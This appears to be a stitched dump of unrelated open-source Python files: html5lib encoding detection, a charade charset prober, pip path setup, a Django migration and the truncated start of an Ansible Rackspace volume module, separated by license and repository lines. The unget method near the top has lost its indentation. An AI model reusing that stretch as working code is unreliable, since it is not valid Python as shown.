            # use it all and read the next chunk
            rv.append(self.chunk[self.chunkOffset:])
            if not self.readChunk():
                # Reached EOF
                break
        r = "".join(rv)
        return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
    """Provides a unicode stream of characters to the HTMLTokenizer.
    This class takes care of character encoding and removing or replacing
    incorrect byte-sequences and also provides column and line tracking.
    """
    def __init__(self, source, override_encoding=None, transport_encoding=None,
                 same_origin_parent_encoding=None, likely_encoding=None,
                 default_encoding="windows-1252", useChardet=True):
        """Initialises the HTMLInputStream.
        HTMLInputStream(source, [encoding]) -> Normalized stream from source
        for use by html5lib.
        source can be either a file-object, local filename or a string.
        The optional encoding parameter must be a string that indicates
        the encoding.  If specified, that encoding will be used,
        regardless of any BOM or later declaration (such as in a meta
        element)
        """
        # Raw Stream - for unicode objects this will encode to utf-8 and set
        # self.charEncoding as appropriate
        self.rawStream = self.openStream(source)
        HTMLUnicodeInputStream.__init__(self, self.rawStream)
        # Encoding Information
        # Number of bytes to use when looking for a meta element with
        # encoding information
        self.numBytesMeta = 1024
        # Number of bytes to use when using detecting encoding using chardet
        self.numBytesChardet = 100
        # Things from args
        self.override_encoding = override_encoding
        self.transport_encoding = transport_encoding
        self.same_origin_parent_encoding = same_origin_parent_encoding
        self.likely_encoding = likely_encoding
        self.default_encoding = default_encoding
        # Determine encoding: (codec_info, confidence) where confidence is
        # "certain" or "tentative".
        self.charEncoding = self.determineEncoding(useChardet)
        assert self.charEncoding[0] is not None
        # Call superclass
        self.reset()
    def reset(self):
        # Wrap the raw byte stream in a decoding reader for the detected
        # encoding; undecodable bytes are replaced rather than raised.
        self.dataStream = self.charEncoding[0].codec_info.streamreader(self.rawStream, 'replace')
        HTMLUnicodeInputStream.reset(self)
    def openStream(self, source):
        """Produces a file object from source.
        source can be either a file object, local filename or a string.
        """
        # Already a file object
        if hasattr(source, 'read'):
            stream = source
        else:
            stream = BytesIO(source)
        try:
            # Encoding detection requires a seekable stream; wrap anything
            # that cannot seek in a BufferedStream.
            stream.seek(stream.tell())
        except:  # pylint:disable=bare-except
            stream = BufferedStream(stream)
        return stream
    def determineEncoding(self, chardet=True):
        """Return (encoding, confidence), trying sources in priority order:
        BOM, override, transport, meta element, parent document, "likely"
        hint, chardet guess, configured default, windows-1252.
        """
        # BOMs take precedence over everything
        # This will also read past the BOM if present
        charEncoding = self.detectBOM(), "certain"
        if charEncoding[0] is not None:
            return charEncoding
        # If we've been overriden, we've been overriden
        charEncoding = lookupEncoding(self.override_encoding), "certain"
        if charEncoding[0] is not None:
            return charEncoding
        # Now check the transport layer
        charEncoding = lookupEncoding(self.transport_encoding), "certain"
        if charEncoding[0] is not None:
            return charEncoding
        # Look for meta elements with encoding information
        charEncoding = self.detectEncodingMeta(), "tentative"
        if charEncoding[0] is not None:
            return charEncoding
        # Parent document encoding (never inherit a utf-16 variant)
        charEncoding = lookupEncoding(self.same_origin_parent_encoding), "tentative"
        if charEncoding[0] is not None and not charEncoding[0].name.startswith("utf-16"):
            return charEncoding
        # "likely" encoding
        charEncoding = lookupEncoding(self.likely_encoding), "tentative"
        if charEncoding[0] is not None:
            return charEncoding
        # Guess with chardet, if available
        if chardet:
            try:
                from chardet.universaldetector import UniversalDetector
            except ImportError:
                pass
            else:
                buffers = []
                detector = UniversalDetector()
                while not detector.done:
                    buffer = self.rawStream.read(self.numBytesChardet)
                    assert isinstance(buffer, bytes)
                    if not buffer:
                        break
                    buffers.append(buffer)
                    detector.feed(buffer)
                detector.close()
                encoding = lookupEncoding(detector.result['encoding'])
                self.rawStream.seek(0)
                if encoding is not None:
                    return encoding, "tentative"
        # Try the default encoding
        charEncoding = lookupEncoding(self.default_encoding), "tentative"
        if charEncoding[0] is not None:
            return charEncoding
        # Fallback to html5lib's default if even that hasn't worked
        return lookupEncoding("windows-1252"), "tentative"
    def changeEncoding(self, newEncoding):
        """Switch to a late-declared encoding (e.g. from a meta element).
        Raises ReparseException when the document must be reparsed from the
        start with the new encoding.
        """
        # Only a tentative encoding may be revised mid-parse.
        assert self.charEncoding[1] != "certain"
        newEncoding = lookupEncoding(newEncoding)
        if newEncoding is None:
            return
        if newEncoding.name in ("utf-16be", "utf-16le"):
            # A late utf-16 declaration is treated as utf-8.
            # NOTE(review): when this branch fires neither branch below runs,
            # so the stream is not reparsed with utf-8 -- confirm intended.
            newEncoding = lookupEncoding("utf-8")
            assert newEncoding is not None
        elif newEncoding == self.charEncoding[0]:
            self.charEncoding = (self.charEncoding[0], "certain")
        else:
            self.rawStream.seek(0)
            # Capture the previous encoding *before* overwriting it so the
            # exception message reports the actual transition.  (Previously
            # self.charEncoding was reassigned first, so the message printed
            # the new encoding twice.)
            oldEncoding = self.charEncoding[0]
            self.charEncoding = (newEncoding, "certain")
            self.reset()
            raise ReparseException("Encoding changed from %s to %s" % (oldEncoding, newEncoding))
    def detectBOM(self):
        """Attempts to detect at BOM at the start of the stream. If
        an encoding can be determined from the BOM return the name of the
        encoding otherwise return None"""
        bomDict = {
            codecs.BOM_UTF8: 'utf-8',
            codecs.BOM_UTF16_LE: 'utf-16le', codecs.BOM_UTF16_BE: 'utf-16be',
            codecs.BOM_UTF32_LE: 'utf-32le', codecs.BOM_UTF32_BE: 'utf-32be'
        }
        # Go to beginning of file and read in 4 bytes
        string = self.rawStream.read(4)
        assert isinstance(string, bytes)
        # Try detecting the BOM using bytes from the string
        encoding = bomDict.get(string[:3])  # UTF-8
        seek = 3
        if not encoding:
            # Need to detect UTF-32 before UTF-16
            encoding = bomDict.get(string)  # UTF-32
            seek = 4
            if not encoding:
                encoding = bomDict.get(string[:2])  # UTF-16
                seek = 2
        # Set the read position past the BOM if one was found, otherwise
        # set it to the start of the stream
        if encoding:
            self.rawStream.seek(seek)
            return lookupEncoding(encoding)
        else:
            self.rawStream.seek(0)
            return None
    def detectEncodingMeta(self):
        """Report the encoding declared by the meta element
        """
        # Only the first numBytesMeta bytes are inspected; the stream is
        # rewound afterwards so parsing starts from the beginning.
        buffer = self.rawStream.read(self.numBytesMeta)
        assert isinstance(buffer, bytes)
        parser = EncodingParser(buffer)
        self.rawStream.seek(0)
        encoding = parser.getEncoding()
        # A meta-declared utf-16 variant is interpreted as utf-8 per spec.
        if encoding is not None and encoding.name in ("utf-16be", "utf-16le"):
            encoding = lookupEncoding("utf-8")
        return encoding
class EncodingBytes(bytes):
    """String-like object with an associated position and various extra methods
    If the position is ever greater than the string length then an exception is
    raised"""
    def __new__(self, value):
        assert isinstance(value, bytes)
        # Lower-case once up front so all subsequent matching is
        # case-insensitive.
        return bytes.__new__(self, value.lower())
    def __init__(self, value):
        # pylint:disable=unused-argument
        # Position starts *before* the first byte; the first __next__ call
        # advances it to index 0.
        self._position = -1
    def __iter__(self):
        return self
    def __next__(self):
        p = self._position = self._position + 1
        if p >= len(self):
            # Past the end: iteration and all position accessors raise.
            raise StopIteration
        elif p < 0:
            raise TypeError
        # Return a length-1 bytes object (indexing would yield an int on py3).
        return self[p:p + 1]
    def next(self):
        # Py2 compat
        return self.__next__()
    def previous(self):
        # Return the byte at the current position and step backwards.
        p = self._position
        if p >= len(self):
            raise StopIteration
        elif p < 0:
            raise TypeError
        self._position = p = p - 1
        return self[p:p + 1]
    def setPosition(self, position):
        # Deliberately raises StopIteration once the end has been passed so
        # callers inside the parsing loop terminate.
        if self._position >= len(self):
            raise StopIteration
        self._position = position
    def getPosition(self):
        if self._position >= len(self):
            raise StopIteration
        if self._position >= 0:
            return self._position
        else:
            # Before the first byte; no valid position yet.
            return None
    position = property(getPosition, setPosition)
    def getCurrentByte(self):
        return self[self.position:self.position + 1]
    currentByte = property(getCurrentByte)
    def skip(self, chars=spaceCharactersBytes):
        """Skip past a list of characters"""
        # Returns the first byte NOT in chars (leaving position on it), or
        # None when the end of the data is reached.
        p = self.position  # use property for the error-checking
        while p < len(self):
            c = self[p:p + 1]
            if c not in chars:
                self._position = p
                return c
            p += 1
        self._position = p
        return None
    def skipUntil(self, chars):
        # Mirror image of skip(): advance to the first byte IN chars.
        p = self.position
        while p < len(self):
            c = self[p:p + 1]
            if c in chars:
                self._position = p
                return c
            p += 1
        self._position = p
        return None
    def matchBytes(self, bytes):
        """Look for a sequence of bytes at the start of a string. If the bytes
        are found return True and advance the position to the byte after the
        match. Otherwise return False and leave the position alone"""
        p = self.position
        data = self[p:p + len(bytes)]
        rv = data.startswith(bytes)
        if rv:
            self.position += len(bytes)
        return rv
    def jumpTo(self, bytes):
        """Look for the next sequence of bytes matching a given sequence. If
        a match is found advance the position to the last byte of the match"""
        newPosition = self[self.position:].find(bytes)
        if newPosition > -1:
            # XXX: This is ugly, but I can't see a nicer way to fix this.
            if self._position == -1:
                self._position = 0
            self._position += (newPosition + len(bytes) - 1)
            return True
        else:
            # Not found: signal the caller to stop parsing entirely.
            raise StopIteration
class EncodingParser(object):
    """Mini parser for detecting character encoding from meta elements"""
    def __init__(self, data):
        """string - the data to work on for encoding detection"""
        self.data = EncodingBytes(data)
        self.encoding = None
    def getEncoding(self):
        """Scan the byte prefix of the document and return the declared
        encoding (a codec object) or None."""
        # Dispatch table tried in order for each "<"-like construct; order
        # matters (b"<!--" must be tested before b"<!", etc.).
        methodDispatch = (
            (b"<!--", self.handleComment),
            (b"<meta", self.handleMeta),
            (b"</", self.handlePossibleEndTag),
            (b"<!", self.handleOther),
            (b"<?", self.handleOther),
            (b"<", self.handlePossibleStartTag))
        for _ in self.data:
            keepParsing = True
            for key, method in methodDispatch:
                if self.data.matchBytes(key):
                    try:
                        # Handlers return False (or raise StopIteration via
                        # EncodingBytes) to stop the scan.
                        keepParsing = method()
                        break
                    except StopIteration:
                        keepParsing = False
                        break
            if not keepParsing:
                break
        return self.encoding
    def handleComment(self):
        """Skip over comments"""
        return self.data.jumpTo(b"-->")
    def handleMeta(self):
        """Inspect a <meta ...> element for charset / http-equiv+content
        declarations; sets self.encoding and returns False when found."""
        if self.data.currentByte not in spaceCharactersBytes:
            # if we have <meta not followed by a space so just keep going
            return True
        # We have a valid meta element we want to search for attributes
        hasPragma = False
        pendingEncoding = None
        while True:
            # Try to find the next attribute after the current position
            attr = self.getAttribute()
            if attr is None:
                return True
            else:
                if attr[0] == b"http-equiv":
                    hasPragma = attr[1] == b"content-type"
                    # A content= attribute seen before the pragma is kept
                    # pending until the pragma confirms it.
                    if hasPragma and pendingEncoding is not None:
                        self.encoding = pendingEncoding
                        return False
                elif attr[0] == b"charset":
                    tentativeEncoding = attr[1]
                    codec = lookupEncoding(tentativeEncoding)
                    if codec is not None:
                        self.encoding = codec
                        return False
                elif attr[0] == b"content":
                    contentParser = ContentAttrParser(EncodingBytes(attr[1]))
                    tentativeEncoding = contentParser.parse()
                    if tentativeEncoding is not None:
                        codec = lookupEncoding(tentativeEncoding)
                        if codec is not None:
                            if hasPragma:
                                self.encoding = codec
                                return False
                            else:
                                pendingEncoding = codec
    def handlePossibleStartTag(self):
        return self.handlePossibleTag(False)
    def handlePossibleEndTag(self):
        # Consume the byte after "</" before checking the tag name.
        next(self.data)
        return self.handlePossibleTag(True)
    def handlePossibleTag(self, endTag):
        """Skip over a non-meta tag (and its attributes) without recording
        anything; returns True to continue scanning."""
        data = self.data
        if data.currentByte not in asciiLettersBytes:
            # If the next byte is not an ascii letter either ignore this
            # fragment (possible start tag case) or treat it according to
            # handleOther
            if endTag:
                data.previous()
                self.handleOther()
            return True
        c = data.skipUntil(spacesAngleBrackets)
        if c == b"<":
            # return to the first step in the overall "two step" algorithm
            # reprocessing the < byte
            data.previous()
        else:
            # Read all attributes
            attr = self.getAttribute()
            while attr is not None:
                attr = self.getAttribute()
        return True
    def handleOther(self):
        # Comments/doctypes/PIs: skip to the closing ">".
        return self.data.jumpTo(b">")
    def getAttribute(self):
        """Return a name,value pair for the next attribute in the stream,
        if one is found, or None"""
        # Step numbers below refer to the HTML "get an attribute" algorithm.
        data = self.data
        # Step 1 (skip chars)
        c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
        assert c is None or len(c) == 1
        # Step 2
        if c in (b">", None):
            return None
        # Step 3
        attrName = []
        attrValue = []
        # Step 4 attribute name
        while True:
            if c == b"=" and attrName:
                break
            elif c in spaceCharactersBytes:
                # Step 6!
                c = data.skip()
                break
            elif c in (b"/", b">"):
                return b"".join(attrName), b""
            elif c in asciiUppercaseBytes:
                attrName.append(c.lower())
            elif c is None:
                return None
            else:
                attrName.append(c)
            # Step 5
            c = next(data)
        # Step 7
        if c != b"=":
            data.previous()
            return b"".join(attrName), b""
        # Step 8
        next(data)
        # Step 9
        c = data.skip()
        # Step 10
        if c in (b"'", b'"'):
            # 10.1
            quoteChar = c
            while True:
                # 10.2
                c = next(data)
                # 10.3
                if c == quoteChar:
                    next(data)
                    return b"".join(attrName), b"".join(attrValue)
                # 10.4
                elif c in asciiUppercaseBytes:
                    attrValue.append(c.lower())
                # 10.5
                else:
                    attrValue.append(c)
        elif c == b">":
            return b"".join(attrName), b""
        elif c in asciiUppercaseBytes:
            attrValue.append(c.lower())
        elif c is None:
            return None
        else:
            attrValue.append(c)
        # Step 11
        while True:
            c = next(data)
            if c in spacesAngleBrackets:
                return b"".join(attrName), b"".join(attrValue)
            elif c in asciiUppercaseBytes:
                attrValue.append(c.lower())
            elif c is None:
                return None
            else:
                attrValue.append(c)
class ContentAttrParser(object):
    """Extracts the charset=... value from a meta "content" attribute.

    NOTE(review): *data* is asserted to be bytes, but parse() relies on
    EncodingBytes methods (jumpTo/skip/position) -- callers pass an
    EncodingBytes instance (a bytes subclass); confirm before reuse.
    """
    def __init__(self, data):
        assert isinstance(data, bytes)
        self.data = data
    def parse(self):
        """Return the encoding name as bytes, or None if not present."""
        try:
            # Check if the attr name is charset
            # otherwise return
            self.data.jumpTo(b"charset")
            self.data.position += 1
            self.data.skip()
            if not self.data.currentByte == b"=":
                # If there is no = sign keep looking for attrs
                return None
            self.data.position += 1
            self.data.skip()
            # Look for an encoding between matching quote marks
            if self.data.currentByte in (b'"', b"'"):
                quoteMark = self.data.currentByte
                self.data.position += 1
                oldPosition = self.data.position
                if self.data.jumpTo(quoteMark):
                    return self.data[oldPosition:self.data.position]
                else:
                    return None
            else:
                # Unquoted value
                oldPosition = self.data.position
                try:
                    self.data.skipUntil(spaceCharactersBytes)
                    return self.data[oldPosition:self.data.position]
                except StopIteration:
                    # Return the whole remaining value
                    return self.data[oldPosition:]
        except StopIteration:
            # Ran off the end of the data at any point: no usable charset.
            return None
def lookupEncoding(encoding):
    """Return the python codec name corresponding to an encoding or None if the
    string doesn't correspond to a valid encoding."""
    # Byte labels must be ascii-decodable to be looked up at all.
    if isinstance(encoding, binary_type):
        try:
            encoding = encoding.decode("ascii")
        except UnicodeDecodeError:
            return None
    if encoding is None:
        return None
    try:
        return webencodings.lookup(encoding)
    except AttributeError:
        # Non-string label (no .strip()/.lower()): not a valid encoding.
        return None
| mit |
sdopoku/flask-blog | env/lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
# Orders below this value are the "frequent" characters used to build
# sequence statistics (see feed() below).
SAMPLE_SIZE = 64
# Minimum number of observed sequences before the shortcut thresholds apply.
SB_ENOUGH_REL_THRESHOLD = 1024
# Confidence above which the prober immediately declares itself the winner.
POSITIVE_SHORTCUT_THRESHOLD = 0.95
# Confidence below which the prober immediately rules itself out.
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
# Orders at or above this value are symbols and are not counted as letters.
SYMBOL_CAT_ORDER = 250
# Number of sequence-likelihood categories in the precedence matrix.
NUMBER_OF_SEQ_CAT = 4
# Index of the most-likely ("positive") sequence category.
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
    """Charset prober for single-byte encodings.

    Feeds character-order pairs through a per-model precedence matrix and
    derives a confidence from the ratio of "positive" (likely) sequences.
    """
    def __init__(self, model, reversed=False, nameProber=None):
        CharSetProber.__init__(self)
        # Language model: charToOrderMap, precedenceMatrix, charsetName, etc.
        self._mModel = model
        # TRUE if we need to reverse every pair in the model lookup
        self._mReversed = reversed
        # Optional auxiliary prober for name decision
        self._mNameProber = nameProber
        self.reset()
    def reset(self):
        CharSetProber.reset(self)
        # char order of last character
        self._mLastOrder = 255
        self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
        self._mTotalSeqs = 0
        self._mTotalChar = 0
        # characters that fall in our sampling range
        self._mFreqChar = 0
    def get_charset_name(self):
        # Delegate to the name prober (e.g. Hebrew logical/visual decision)
        # when one is attached.
        if self._mNameProber:
            return self._mNameProber.get_charset_name()
        else:
            return self._mModel['charsetName']
    def feed(self, aBuf):
        """Consume a buffer of bytes and update sequence statistics; returns
        the (possibly shortcut-updated) detection state."""
        if not self._mModel['keepEnglishLetter']:
            aBuf = self.filter_without_english_letters(aBuf)
        aLen = len(aBuf)
        if not aLen:
            return self.get_state()
        for c in aBuf:
            order = self._mModel['charToOrderMap'][wrap_ord(c)]
            if order < SYMBOL_CAT_ORDER:
                self._mTotalChar += 1
            if order < SAMPLE_SIZE:
                self._mFreqChar += 1
                # Only count a sequence when both this character and the
                # previous one are in the frequent sample range.
                if self._mLastOrder < SAMPLE_SIZE:
                    self._mTotalSeqs += 1
                    if not self._mReversed:
                        i = (self._mLastOrder * SAMPLE_SIZE) + order
                        model = self._mModel['precedenceMatrix'][i]
                    else:  # reverse the order of the letters in the lookup
                        i = (order * SAMPLE_SIZE) + self._mLastOrder
                        model = self._mModel['precedenceMatrix'][i]
                    self._mSeqCounters[model] += 1
            self._mLastOrder = order
        if self.get_state() == constants.eDetecting:
            if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
                # Enough data: allow early positive/negative shortcuts.
                cf = self.get_confidence()
                if cf > POSITIVE_SHORTCUT_THRESHOLD:
                    if constants._debug:
                        sys.stderr.write('%s confidence = %s, we have a'
                                         'winner\n' %
                                         (self._mModel['charsetName'], cf))
                    self._mState = constants.eFoundIt
                elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
                    if constants._debug:
                        sys.stderr.write('%s confidence = %s, below negative'
                                         'shortcut threshhold %s\n' %
                                         (self._mModel['charsetName'], cf,
                                          NEGATIVE_SHORTCUT_THRESHOLD))
                    self._mState = constants.eNotMe
        return self.get_state()
    def get_confidence(self):
        """Return a confidence in [0.01, 0.99] based on the share of
        positive sequences, scaled by the model's typical positive ratio
        and the fraction of frequent characters seen."""
        r = 0.01
        if self._mTotalSeqs > 0:
            r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
                 / self._mModel['mTypicalPositiveRatio'])
            r = r * self._mFreqChar / self._mTotalChar
            if r >= 1.0:
                r = 0.99
        return r
| gpl-2.0 |
bakkou-badri/dataminingproject | env/lib/python2.7/site-packages/pip/locations.py | 390 | 6202 | """Locations where we look for configs, install stuff, etc"""
import sys
import site
import os
import tempfile
from distutils.command.install import install, SCHEME_KEYS
import getpass
from pip.backwardcompat import get_python_lib, get_path_uid, user_site
import pip.exceptions
# Contents of the marker file pip drops into unpacked source directories.
DELETE_MARKER_MESSAGE = '''\
This file is placed here by pip to indicate the source was put
here by pip.
Once this package is successfully installed this source code will be
deleted (unless you remove this file).
'''
# Name of the marker file (its presence tells pip the directory is disposable).
PIP_DELETE_MARKER_FILENAME = 'pip-delete-this-directory.txt'
def write_delete_marker_file(directory):
    """
    Write the pip delete marker file into this directory.
    """
    filepath = os.path.join(directory, PIP_DELETE_MARKER_FILENAME)
    # Use a context manager so the handle is closed even if the write
    # fails (the original open/write/close leaked the handle on error).
    with open(filepath, 'w') as marker_fp:
        marker_fp.write(DELETE_MARKER_MESSAGE)
def running_under_virtualenv():
    """
    Return True if we're running inside a virtualenv, False otherwise.
    """
    # Classic virtualenv exposes sys.real_prefix; PEP 405 venvs make
    # sys.prefix differ from sys.base_prefix.
    in_virtualenv = hasattr(sys, 'real_prefix')
    in_venv = sys.prefix != getattr(sys, "base_prefix", sys.prefix)
    if in_virtualenv or in_venv:
        return True
    return False
def virtualenv_no_global():
    """
    Return True if in a venv and no system site packages.
    """
    # Mirrors virtualenv.py's logic: the marker file lives next to the
    # stdlib site module when --no-site-packages was used.
    site_dir = os.path.dirname(os.path.abspath(site.__file__))
    marker = os.path.join(site_dir, 'no-global-site-packages.txt')
    # Note: falls through (returning None) when the condition is false,
    # matching the original implicit-return behaviour.
    if running_under_virtualenv() and os.path.isfile(marker):
        return True
def __get_username():
    """ Returns the effective username of the current process. """
    if sys.platform != 'win32':
        # POSIX: resolve the effective uid via pwd; the module does not
        # exist on Windows, so it is imported only on this branch.
        import pwd
        return pwd.getpwuid(os.geteuid()).pw_name
    return getpass.getuser()
def _get_build_prefix():
    """ Returns a safe build_prefix """
    # Per-user build directory under the system temp dir, so concurrent
    # users cannot clobber (or symlink-attack) each other's builds.
    path = os.path.join(tempfile.gettempdir(), 'pip_build_%s' %
                        __get_username())
    if sys.platform == 'win32':
        """ on windows(tested on 7) temp dirs are isolated """
        return path
    try:
        os.mkdir(path)
        write_delete_marker_file(path)
    except OSError:
        # Directory already exists: verify we own it and it is not a symlink
        # before trusting it.
        file_uid = None
        try:
            # raises OSError for symlinks
            # https://github.com/pypa/pip/pull/935#discussion_r5307003
            file_uid = get_path_uid(path)
        except OSError:
            file_uid = None
        if file_uid != os.geteuid():
            msg = "The temporary folder for building (%s) is either not owned by you, or is a symlink." \
                % path
            print (msg)
            print("pip will not work until the temporary folder is " + \
                "either deleted or is a real directory owned by your user account.")
            raise pip.exceptions.InstallationError(msg)
    return path
# Module-level path computation: build/src prefixes, site-packages, and the
# per-platform default config/log locations.  Order matters: build_prefix is
# derived first, then normalised below.
if running_under_virtualenv():
    build_prefix = os.path.join(sys.prefix, 'build')
    src_prefix = os.path.join(sys.prefix, 'src')
else:
    # Note: intentionally NOT using mkdtemp
    # See https://github.com/pypa/pip/issues/906 for plan to move to mkdtemp
    build_prefix = _get_build_prefix()
    ## FIXME: keep src in cwd for now (it is not a temporary folder)
    try:
        src_prefix = os.path.join(os.getcwd(), 'src')
    except OSError:
        # In case the current working directory has been renamed or deleted
        sys.exit("The folder you are executing pip from can no longer be found.")
# under Mac OS X + virtualenv sys.prefix is not properly resolved
# it is something like /path/to/python/bin/..
# Note: using realpath due to tmp dirs on OSX being symlinks
build_prefix = os.path.abspath(os.path.realpath(build_prefix))
src_prefix = os.path.abspath(src_prefix)
# FIXME doesn't account for venv linked to global site-packages
site_packages = get_python_lib()
user_dir = os.path.expanduser('~')
if sys.platform == 'win32':
    bin_py = os.path.join(sys.prefix, 'Scripts')
    bin_user = os.path.join(user_site, 'Scripts') if user_site else None
    # buildout uses 'bin' on Windows too?
    if not os.path.exists(bin_py):
        bin_py = os.path.join(sys.prefix, 'bin')
        bin_user = os.path.join(user_site, 'bin') if user_site else None
    default_storage_dir = os.path.join(user_dir, 'pip')
    default_config_file = os.path.join(default_storage_dir, 'pip.ini')
    default_log_file = os.path.join(default_storage_dir, 'pip.log')
else:
    bin_py = os.path.join(sys.prefix, 'bin')
    bin_user = os.path.join(user_site, 'bin') if user_site else None
    default_storage_dir = os.path.join(user_dir, '.pip')
    default_config_file = os.path.join(default_storage_dir, 'pip.conf')
    default_log_file = os.path.join(default_storage_dir, 'pip.log')
# Forcing to use /usr/local/bin for standard Mac OS X framework installs
# Also log to ~/Library/Logs/ for use with the Console.app log viewer
if sys.platform[:6] == 'darwin' and sys.prefix[:16] == '/System/Library/':
    bin_py = '/usr/local/bin'
    default_log_file = os.path.join(user_dir, 'Library/Logs/pip.log')
def distutils_scheme(dist_name, user=False, home=None, root=None):
    """
    Return a distutils install scheme

    Builds a throwaway Distribution for *dist_name*, lets distutils'
    install command finalize its paths (honouring user/home/root), and
    returns a dict keyed by SCHEME_KEYS (purelib, platlib, headers,
    scripts, data).
    """
    from distutils.dist import Distribution
    scheme = {}
    d = Distribution({'name': dist_name})
    # Pick up distutils config files (setup.cfg, pydistutils.cfg, ...).
    d.parse_config_files()
    i = d.get_command_obj('install', create=True)
    # NOTE: setting user or home has the side-effect of creating the home dir or
    # user base for installations during finalize_options()
    # ideally, we'd prefer a scheme class that has no side-effects.
    i.user = user or i.user
    i.home = home or i.home
    i.root = root or i.root
    i.finalize_options()
    for key in SCHEME_KEYS:
        scheme[key] = getattr(i, 'install_'+key)
    if running_under_virtualenv():
        # distutils' default headers path escapes the venv; pin it inside.
        scheme['headers'] = os.path.join(sys.prefix,
                                         'include',
                                         'site',
                                         'python' + sys.version[:3],
                                         dist_name)
        if root is not None:
            # Re-root the headers path the same way finalize_options() would.
            scheme["headers"] = os.path.join(
                root,
                os.path.abspath(scheme["headers"])[1:],
            )
    return scheme
| gpl-2.0 |
swcarpentry/amy | amy/workshops/migrations/0079_eventsubmission.py | 3 | 1490 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-13 11:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the EventSubmission model."""
    dependencies = [
        ('workshops', '0078_auto_20160212_1257'),
    ]
    operations = [
        migrations.CreateModel(
            name='EventSubmission',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('active', models.BooleanField(default=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('url', models.URLField(verbose_name="Link to the workshop's website")),
                ('contact_name', models.CharField(max_length=100, verbose_name='Your name')),
                ('contact_email', models.EmailField(help_text='We may need to contact you regarding workshop details.', max_length=254, verbose_name='Your email')),
                ('self_organized', models.BooleanField(default=False, verbose_name='Was the workshop self-organized?')),
                ('notes', models.TextField(blank=True, default='')),
                ('assigned_to', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| mit |
randynobx/ansible | lib/ansible/modules/cloud/rackspace/rax_cbs.py | 70 | 7282 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
# Standard Ansible module metadata consumed by ansible-doc and the test
# infrastructure (maturity level and support channel).
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rax_cbs
short_description: Manipulate Rackspace Cloud Block Storage Volumes
description:
- Manipulate Rackspace Cloud Block Storage Volumes
version_added: 1.6
options:
description:
description:
- Description to give the volume being created
default: null
image:
description:
- image to use for bootable volumes. Can be an C(id), C(human_id) or
C(name). This option requires C(pyrax>=1.9.3)
default: null
version_added: 1.9
meta:
description:
- A hash of metadata to associate with the volume
default: null
name:
description:
- Name to give the volume being created
default: null
required: true
size:
description:
- Size of the volume to create in Gigabytes
default: 100
required: true
snapshot_id:
description:
- The id of the snapshot to create the volume from
default: null
state:
description:
- Indicate desired state of the resource
choices:
- present
- absent
default: present
required: true
volume_type:
description:
- Type of the volume being created
choices:
- SATA
- SSD
default: SATA
required: true
wait:
description:
- wait for the volume to be in state 'available' before returning
default: "no"
choices:
- "yes"
- "no"
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
author:
- "Christopher H. Laco (@claco)"
- "Matt Martz (@sivel)"
extends_documentation_fragment: rackspace.openstack
'''
EXAMPLES = '''
- name: Build a Block Storage Volume
gather_facts: False
hosts: local
connection: local
tasks:
- name: Storage volume create request
local_action:
module: rax_cbs
credentials: ~/.raxpub
name: my-volume
description: My Volume
volume_type: SSD
size: 150
region: DFW
wait: yes
state: present
meta:
app: my-cool-app
register: my_volume
'''
from distutils.version import LooseVersion
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def cloud_block_storage(module, state, name, description, meta, size,
                        snapshot_id, volume_type, wait, wait_timeout,
                        image):
